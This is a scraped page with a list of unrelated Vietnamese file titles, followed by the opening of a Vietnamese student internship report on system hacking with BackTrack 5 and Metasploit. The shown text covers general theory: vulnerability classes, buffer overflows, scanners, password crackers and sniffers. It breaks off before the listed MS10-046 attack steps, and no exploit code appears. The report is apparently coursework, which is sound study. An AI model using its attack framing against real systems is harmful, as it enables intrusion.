GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
 
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoiC6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
 
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdfxemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
 
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
 
Bài giảng môn Truyền thông đa phương tiện
Bài giảng môn Truyền thông đa phương tiệnBài giảng môn Truyền thông đa phương tiện
Bài giảng môn Truyền thông đa phương tiện
 
Đề thi tin học HK2 lớp 3 Chân Trời Sáng Tạo
Đề thi tin học HK2 lớp 3 Chân Trời Sáng TạoĐề thi tin học HK2 lớp 3 Chân Trời Sáng Tạo
Đề thi tin học HK2 lớp 3 Chân Trời Sáng Tạo
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
 
Bài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptx
Bài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptxBài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptx
Bài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptx
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
 
bài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhbài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hành
 
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfBỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
 
TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...
TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...
TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfxemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
 
bài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docxbài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docx
 

Doan_duy_khiem

  • 1. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 1 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Mục Lục CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5.............................................5 I. Giớithiệu.............................................................................................................................................5 II. Mụcđích.............................................................................................................................................6 CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY ..................7 I. Giớithiệu.......................................................................................................................................7 II. Vấnđềbảomậthệthốngvàmạng....................................................................................................7 CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking ....................................13 I. Giới Thiệu Về Metasploit........................................................................13 1. Giới Thiệu..................................................................................................................................13 2. Các Thành Phần Của Metasploit................................................................................................13 3. Sử dụng Metasploit Framework.................................................................................................14 a) Chọn module exploit.............................................................................................................. 14 b) Cấu hình module exploit đã chọn........................................................................................... 14 c) Verify những options vừa cấu hình........................................................................................ 14 d) Lựa chọn target ...................................................................................................................... 14 e) Lựa chọn payload................................................................................................................... 14 f) Thựcthiexploit........................................................................................................................ 15 4. Giớithiệu Payload Meterpreter ..................................................................................................15 a) Sử dụng module Fs................................................................................................................. 15 b) Sử dụng module Net............................................................................................................... 16 c) Sử dụng module Process........................................................................................................ 16 d) Sử dụng module Sys............................................................................................................... 16 5. Cách phòng chống .....................................................................................................................16 II. Lỗi MS10-046 (2286198)..........................................................................16
  • 2. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 2 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP 1. Giới thiệu ...................................................................................................................................16 2. Các bước tấn công......................................................................................................................17 a. (mạng LAN)............................................................................................................................. 17 b. Triễn Khai trên vps................................................................................................................. 32 III. Cách phòng chống....................................................................................36 Tài Liệu Tham Khảo..........................................................................................36
  • 3. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 3 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ……………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… .…………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ….………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …….……………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……….…………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………….………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………….……………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………….…………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………….………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………………….……………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………….…………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………………….………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………………. NGÀY… THÁNG… NĂM
  • 4. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 4 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ……………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… .…………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ….………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …….……………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……….…………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………….………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………….……………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………….…………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………….………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… …………………….……………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………….…………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ………………………….………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………… ……………………………. NGÀY… THÁNG… NĂM
  • 5. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 5 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Lời Cảm Ơn Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với các thầy cô của Trung tâm đào tạo quản trị mạng và an ninh quốc tế ATHENA , đặc biệt là các thầy cô khoa Công Nghệ Thông Tin của trƣờng đã tạo điều kiện cho em thực tập ở khoa để có nhiều thời gian cho khóa luận tốt nghiệp. Và em cũng xin chân thành cám ơn thầy Võ Công Minh đã nhiệt tình hƣớng dẫn hƣớng dẫn em hoàn thành tốt khóa thực tập. Trong quá trình thực tập, cũng nhƣ là trong quá trình làm bài báo cáo, khó tránh khỏi sai sót, rất mong các Thầy, Cô bỏ qua. Đồng thời do trình độ lý luận cũng nhƣkinh nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận đƣợc ý kiến đóng góp Thầy, Cô để em học thêm đƣợc nhiều kinh nghiệm và sẽ hoàn thành tốt hơn bài báo cáo tốt nghiệp sắp tới. Em xin chân thành cảm ơn ! CHƢƠNGI. GIỚI THIỆU VỀ BACKTRACK 5 I. Giớithiệu Backtrack làmộtbảnphânphốidạngLiveDVDcủaLinux,đượcpháttriểnđểthử nghiệm thâm nhập.Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtracktrực tiếptừđĩaDVDmàkhôngcần càinóvào máycủachúngta.Backtrack cũngcó thểđượccài đặt vàoổcứngvàsửdụngnhưmộthệđiềuhành.Backtracklà sự hợpnhấtgiữa3bảnphânphốikhácnhaucủaLinuxvềthâmnhậpthửnghiệm - IWHAX,WHOPPIX,và Auditor.Trongphiênbảnhiệntạicủanó(5),Backtrackđược dựatrênphiênbảnphânphốiLinuxUbuntu11.10.Tínhđếnngày19thángbảynăm 2010,Backtrack5đãđượctảivềcủahơn1,5triệungườisửdụng.Phiên bảnmớinhất làBacktrack5R2
  • 6. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 6 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP II. Mụcđích Công cụBacktrack đãcólịchsửpháttriểnkhálâuquanhiềubảnlinuxkhác nhau.PhiênbảnhiệnnaysửdụngbảnphânphốiSlackwarelinux(TomasM.(www.slax.org)) .Backtrackliên tục cậpnhậtcáccôngcụ,drivers,...hiệntạiBacktrack cótrên300côngcụphụcvụchoviệcnghiêncứubảomật.Backtracklàsựkếthợp giữa2bộcôngcụkiểmthửbảo mậtrất nổitiếnglà WhaxvàAuditor. Backtrack5chứamộtsốcôngcụcóthểđượcsửdụngtrongquátrìnhthử nghiệmthâmnhậpcủachúngta.Cáccông cụkiểmtrathâmnhậptrongBacktrack5,0 cóthểđượcphânloạinhưsau:  Informationgathering: loạinàycóchứamộtsốcôngcụcóthểđượcsử dụng đểcóđượcthôngtinliênquanđếnmộtmụctiêuDNS,định tuyến, địa chỉe- mail,trangweb,máychủmail,vànhưvậy.Thôngtinnàyđượcthu thậptừcácthôngtincósẵntrênInternet,màkhôngcầnchạmvàomôi trườngmụctiêu.  Networkmapping:loạinàychứacáccôngcụcóthểđượcsửdụngđểkiểm tracáchostđangtồntại,thông tinvềOS,ứngdụngđượcsửdụngbởimục tiêu,vàcũnglàmportscanning.  Vulnerabilityidentification:Trongthểloạinày,chúngtacóthểtìmthấycác côngcụđểquétcáclỗhổng(tổng hợp)vàtrongcácthiếtbịCisco. Nócũng chứacáccôngcụđểthựchiệnvàphântíchServer MessageBlock(SMB) và SimpleNetworkManagementProtocol(SNMP).  Webapplicationanalysis:loạinàychứacáccôngcụcóthểđượcsửdụng trongtheodõi,giámsátcácứngdụngweb  Radionetworkanalysis:Đểkiểmtramạngkhôngdây,bluetoothvànhận dạng tầnsốvôtuyến (RFID),chúngtacóthểsửdụng cáccôngcụtrongthể loạinày.  Penetration:loạinày chứacáccôngcụcóthểđượcsửdụngđểkhaitháccáclỗ hổngtìmthấytrongcácmáytínhmụctiêu  Privilegeescalation: Saukhikhaitháccáclỗhổngvàđượctruycậpvàocác máytínhmụctiêu,chúngtacóthểsửdụngcáccôngcụtrongloạinàyđể nângcaođặcquyềncủachúngtachocácđặcquyềncaonhất.  Maintainingaccess:Côngcụtrongloạinàysẽcóthểgiúpchúngtatrong việcduytrìquyềntruycậpvàocácmáytínhmụctiêu.Chúngtacóthểcần
  • 7. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 7 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP đểcóđượcnhững đặcquyềncaonhấttrướckhicácchúngtacóthểcàiđặt côngcụđểduytrì quyềntruycập  VoiceOverIP (VOIP):ĐểphântíchVOIP chúngtacóthểsửdụngcáccông cụtrongthểloạinày  Digitalforensics:Trongloạinày,chúngtacóthểtìmthấy mộtsốcôngcụcó thểđượcsửdụngđểlàmphântíchkỹthuậtnhưcóđượchìnhảnhđĩacứng, cấutrúccáctậptin,vàphântíchhìnhảnhđĩacứng.Đểsửdụngcáccôngcụ cungcấptrongthểloạinày,chúngtacóthểchọnStartBacktrackForensics trongtrìnhđơnkhởiđộng.Đôikhisẽ đòihỏichúngta phảigắnkết nộibộđĩa cứngvàcáctậptintraođổitrongchếđộchỉđọcđểbảotồntínhtoànvẹn. Reverseengineering:Thểloạinàychứacáccôngcụcóthểđượcsửdụngđểgỡrốichư ơngtrìnhmộthoặctháorời mộttập tinthựcthi. CHƢƠNG 2.TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY I. Giớithiệu Anninhantoànmạngmáytínhhoàntoànlàvấnđềconngười,dođóviệcđưa ramột hànhlangpháplývàcácquy nguyêntắclàmviệccụthểlàcầnthiết.Ởđây, hành lang pháplýcóthểgồm:cácđiềukhoảntrongbộluậtcủanhànước,cácvăn bản dướiluật,...Còncácquyđịnhcóthểdotừngtổchứcđặtrachophùhợpvớitừng đặcđiểmriêng.Cácquy địnhcóthểnhư:quy địnhvềnhânsự,việcsửdụng máy,sửdụngphầnmềm,... Vànhưvậy,sẽhiệuquảnhấttrongviệcđảmbảoanninh an toànchohệthốngmạngmáytínhmộtkhita thựchiệntriệt đểgiảiphápvề chính sáchconngười.Tómlại,vấnđềanninhantoànmạngmáytínhlàmộtvấnđề lớn,nóyêu cầu cầnphảicómộtgiảipháptổngthể,khôngchỉphầnmềm,phầncứng máytính mànóđòihỏicảvấnđềchínhsáchvềconngười. Vàvấnđềnày cầnphải được thực hiệnmộtcáchthườngxuyênliêntục,khôngbaogiờtriệtđểđượcvìnó luôn nảy sinhtheothờigian.Tuynhiên,bằngcácgiảipháptổngthểhợplý,đặcbiệt là giảiquyếttốtvấnđềchínhsáchvềconngườitacóthểtạorachomìnhsựan toàn chắcchắnhơn II. Vấnđềbảomậthệthốngvàmạng 1. Cácvấn dềchung vềbảo mật hệthống và mạng Đặcđiểmchungcủamộthệthốngmạnglàcónhiềungườisửdụngchung vàphântánvề mặt địa lýnênviệcbảovệtàinguyên(mất máthoặcsửdụngkhông hợplệ)phứctạphơnnhiềusovớiviệcmôitrườngmộtmáytínhđơnlẻ,hoặc
  • 8. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 8 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP mộtngườisửdụng.Hoạtđộngcủangườiquảntrịhệthốngmạngphảiđảmbảocác thôngtintrênmạnglàtincậyvàsửdụngđúngmụcđích,đốitượngđồngthờiđảmbảo mạnghoạtđộngổnđịnhkhôngbịtấncôngbởinhữngkẻpháhoại.Nhưngtrênthựctế làkhôngmộtmạngnàođảmbảolàantoàntuyệtđối,mộthệthốngdùđượcbảovệ chắcchắnđến mứcnàothìcũngcó lúcbịvôhiệuhóabởinhữngkẻcó ýđồxấu. 2. Một số kháiniệmvà lịch sử bảo mật hệthống a)Đối tượngtấn công mạng (intruder) Đốitượng lànhững cánhânhoặctổchứcsửdụngnhững kiến thứcvề mạngvà cáccôngcụpháhoại(gồm phần cứnghoặcphầnmềm) đểdòtìmcácđiểm yếuvà cáclỗhổng bảomậttrênhệthống,thựchiệncáchoạtđộngxâmnhậpvà chiếmđoạttàinguyêntráiphép.Mộtsốđốitượngtấncôngmạngnhư:Hacker:lànhững kẻxâmnhậpvàomạngtráiphépbằngcáchsửdụngcáccôngcụphámậtkhẩuhoặc khai thác cácđiểmyếucủa thànhphầntruynhậptrên hệthốngMasquerader:Lànhững kẻgiảmạothông tintrênmạng nhưgiảmạođịachỉIP, tênmiền,địnhdanhngười dùng…Eavesdropping:Lànhữngđốitượngnghetrộmthôngtintrênmạng,sử dụngcác côngcụSniffer,sauđódùngcáccôngcụphântíchvàdebugđểlấyđược cácthôngtincógiátrị. Nhữngđốitượngtấncôngmạngcóthểnhằmnhiềumụcđích khácnhaunhưăncắpcácthôngtincógiátrịvềkinhtế,pháhoạihệthốngmạngcó chủ định,hoặccóthểđólà nhữnghànhđộngvôýthức… b)Các lỗhổngbảomật Cáclỗhổngbảomậtlànhữngđiểmyếutrênhệthốnghoặcẩnchứa trongmột dịchvụmàdựavàođókẻtấncôngcóthểxâmnhậptráiphépvàohệthống đểthựchiệnnhữnghànhđộngpháhoạichiếmđoạttàinguyênbấthợppháp.Cónhiều nguyênnhângây ranhữnglỗhổngbảomật:cóthểdolỗicủabảnthân hệthống,hoặc phầnmềmcungcấphoặcngườiquảntrịyếukémkhônghiểusâu vềcácdịchvụcung cấp…Mứcđộảnhhưởngcủacáclỗhổngtớihệ thốnglàkhácnhau.Cólỗhổngchỉảnh hưởngtớichấtlượngdịchvụcungcấp,cólỗhổngảnhhưởngtớitoànbộhệthốnghoặc pháhủyhệ thống c)Chính sách bảomật Chínhsáchbảomậtlàtậphợpcácquytắcápdụngchonhữngngười thamgiaquảntrị mạng,cósửdụngcáctàinguyênvàcácdịchvụmạng.
  • 9. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 9 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP Đốivớitừngtrườnghợpphảicóchínhsáchbảomậtkhácnhau.Chính sáchbảo mậtgiúpngườisửdụngbiếttráchnhiệmcủamìnhtrongviệc bảovệcáctàinguyêntrênmạng,đồngthờicòngiúpchonhàquảntrịmạngthiếtlập cácbiênphápđảm bảohữuhiệutrongquátrìnhtrangbị,cấuhìnhvàkiểmsoáthoạt độngcủahệthốngvà mạng. 3. Các loạilỗ hổng bảomật vàphƣơng thứctấn công mạng chủ yếu a)Các loại lỗ hổng Cónhiềucáctổchứcđãtiếnhànhphânloạicácdạnglỗhổngđặcbiệt. TheobộquốcphòngMỹcácloạilỗhổngđượcphânlàmbaloạinhưsau: LỗhổngloạiC ChophépthựchiệncáchìnhthứctấncôngtheoDoS(Denial ofServices-Từ chốidịch vụ)Mứcđộnguyhiểmthấp chỉ ảnh hưởngtớichấtlượngdịchvụ,làmngưng trệ,giánđoạnhệthống,khônglàmpháhỏngdữliệuhoặcđạtđượcquyềntruy cậpbất hợppháp.DoSlàhìnhthứctấncôngsửdụngcácgiaothứcởtầngInternettrongbộgiao thứcTCP/IP đểlàmhệthốngngưngtrệdẫnđếntìnhtrạngtừchốingườisửdụng hợp pháptruynhậphaysửdụnghệthống.Cácdịchvụcólỗhổngchophépcáccuộctấn côngDoScóthểđượcnângcấphoặcsửachữabằngcácphiênbản mớihơncủacácnhàcung cấp dịch vụ. Hiệnnay chưa có một biện pháp hữu hiệu nào để khắc phục tình trạng tấn công kiểu nàyvì bản thân thiết kế ở tầng Internet (IP) nói riêng và bộ giao thức TCP/IP nói chungđã ẩn chứa những nguy cơ tiềm tang của các lỗ hổng loại này. Lỗ hổng loại B: Cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần kiểm tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật.Lỗ hổng này thường có trong các ứng dụng trên hệ thống .Có mức độ nguy hiểm là trung bình.Lỗ hổng loại B này có mức độ nguy hiểm hơn lỗ hổng loại C. Cho phépngười sử dụng nội bộ có thể chiếm được quyền cao hơn hoặc truy nhậpkhônghợp pháp. Những lỗ hổng loại này thường xuất hiện trong các dịch vụ trên hệ thống.Ngườ sử dụng local được hiểu là người đã có quyền truy nhập vào hệ thống vớimột số quyền hạn nhất định.Tìm hiểu vấn đề bảo mật mạng LAN. Một dạng khác của lỗ hổng loại B xảy ra với các chương trình viết bằng mã nguồn C. Những chương
  • 10. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 10 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP trình viết bằng mã nguồn C thường sử dụng một vùngđệm, một vùng trong bộ nhớ sử dụng để lưu trữ dữ liệu trước khi xử lý. Người lậptrình thường sử dụng vùng đệm trong bộ nhớ trước khi gán một khoảng không gian bộ nhớ cho từng khối dữ liệu. Ví dụ khi viết chương trình nhập trường tên người sửdụng quy định trường này dài 20 ký tự bằng khai báo:Charfirst_name [20]; Khai báo này cho phép người sử dụng nhập tối đa 20ký tự. Khi nhập dữ liệu ban đầu dữ liệu được lưu ở vùng đệm. Khi người sử dụngnhập nhiều hơn 20 ký tự sẽ tràn vùng đệm.Những ký tự nhập thừa sẽ nằm ngoàivùng đệm khiến ta không thể kiểm soát được.Nhưng đối với những kẻ tấn côngchúng có thể lợi dụng những lỗ hổng này để nhập vào những ký tự đặc biệt để thựcthi một số lệnh đặc biệt trên hệ thống. Thông thường những lỗ hổng này được lợidụng bởi những người sử dụng trên hệ thống để đạt được quyền root không hợp lệ.Để hạn chế được các lỗ hổng loại B phải kiêm soát chặt chẽ cấu hình hệ thống vàcác chương trình. Lỗ hổng loại A Cho phép người ngoài hệ thống có thể truy cập bất hợp phápvào hệ thống.Có thể làm phá huỷ toàn bộ hệ thống.Loại lỗ hổng này có mức độ rấtnguy hiểm đe dọa tính toàn vẹn và bảo mật của hệ thống.Các lỗ hổng này thườngxuất hiện ở những hệ thống quản trị yếu kém hoặc không kiểm soát được cấu hìnhmạng.Những lỗ hổng loại này hết sức nguy hiểm vì nó đã tồn tại sẵn có trên phầnmềm sử dụng, người quản trị nếu không hiểu sâu về dịch vụ và phần mềm sử dụngcó thể bỏ qua điểm yếu này.Vì vậy thường xuyên phải kiểm tra các thông báo củacác nhóm tin về bảo mật trên mạng để phát hiện những lỗ hổng loại này. Một loạtcác chương trình phiên bản cũ thường sử dụng có những lỗ hổng loại A như: FTP,Gopher, Telnet, Sendmail, ARP, finger. b)Cáchìnhthứctấncôngmạngphổbiến Scanner Scannerlàmộtchươngtrìnhtựđộngràsoátvàpháthiệnnhữngđiểmyếuvề bảomậttrênmộttrạmlàmviệccụcbộhoặcmộttrạm ởxa.Mộtkẻpháhoạisửdụng chươngtrìnhScannercóthểpháthiệnranhững lỗhổngvềbảomậttrênmộtServerdù ởxa.Cơchếhoạtđộnglàràsoátvàpháthiện nhữngcổngTCP/UDPđượcsửdụngtrên hệthốngcầntấncôngvàcácdịchvụsửdụngtrênhệthốngđó.Scanner ghilạinhững đáp ứngtrênhệthốngtừxatương ứngvớidịch vụmànóphát hiệnra.Từđónócóthể tìmrađiêmyếucủahệthống.NhữngyếutốđểmộtScannerhoạtđộngnhưsau:Yêu
  • 11. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh 11 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP cầuthiếtbịvàhệthống: Môitrường cóhỗtrợTCP/IPHệthốngphảikếtnốivàomạng Internet.CácchươngtrìnhScannercóvaitròquantrọngtrong mộthệthốngbảo mật,vì chúngcókhảnăngpháthiệnranhữngđiểmyếukémtrênmộthệ thốngmạng. PasswordCracker Làmộtchươngtrìnhcó khảnănggiảimãmộtmậtkhẩuđã đượcmãhoáhoặccó thểvôhiệu hoá chứcnăngbảo vệmậtkhẩu của mộthệthống.Mộtsốchươngtrìnhphá khoácónguyêntắchoạtđộngkhácnhau.Mộtsốchương trìnhtạoradanhsáchcáctừ giớihạn,áp dụngmộtsố thuậttoán mãhoátừkết quảso sánhvớiPasswordđãmãhoá cầnbẻkhoáđểtạoramộtdanhsáchkháctheomộtlogiccủachươngtrình.Khithấy phùhợpvớimậtkhẩuđãmãhoá,kẻpháhoạiđãcóđượcmậtkhẩudướidạngtext. Mậtkhẩutextthôngthườngsẽđượcghivàomộtfile.Biệnphápkhắcphụcđốivới cáchthứcpháhoạinàylàcầnxâydựngmộtchínhsáchbảovệ mậtkhẩuđúngđắn. Sniffer Snifferlàcáccôngcụ(phầncứnghoặcphầnmềm)”bắt”cácthôngtin lưuchuyểntrênmạngvàlấycácthôngtincógiátrịtraođổitrênmạng.Sniffer cóthể “bắt”đượccácthôngtintraođổigiữanhiềutrạmlàmviệc vớinhau. Thựchiệnbắtcác góitintừtầngIP trởxuống.GiaothứcởtầngIP đượcđịnhnghĩacôngkhai,và cấutrúc cáctrườngheaderrõràng,nênviệcgiảimãcácgóitinnàykhôngkhókhăn. Mụcđíchcủacácchươngtrìnhsniffer đólàthiếtlậpchếđộpromiscuous(mode dùngchung)trêncáccardmạngethernet-nơicácgóitintraođổitrongmạng -từđó "bắt"đượcthôngtin.Các thiếtbịsniffer cóthểbắtđượctoànbộthôngtintraođổitrên mạnglàdựavàonguyêntắcbroadcast (quảngbá)cácgọitintrongmạngEthernet.Tuy nhiênviệcthiếtlậpmộthệthốngsniffer không phảiđơngiảnvìcầnphảixâm nhập đượcvàohệthốngmạngđóvàcàiđặtcácphầnmềmsniffer.Đồng thờicácchương 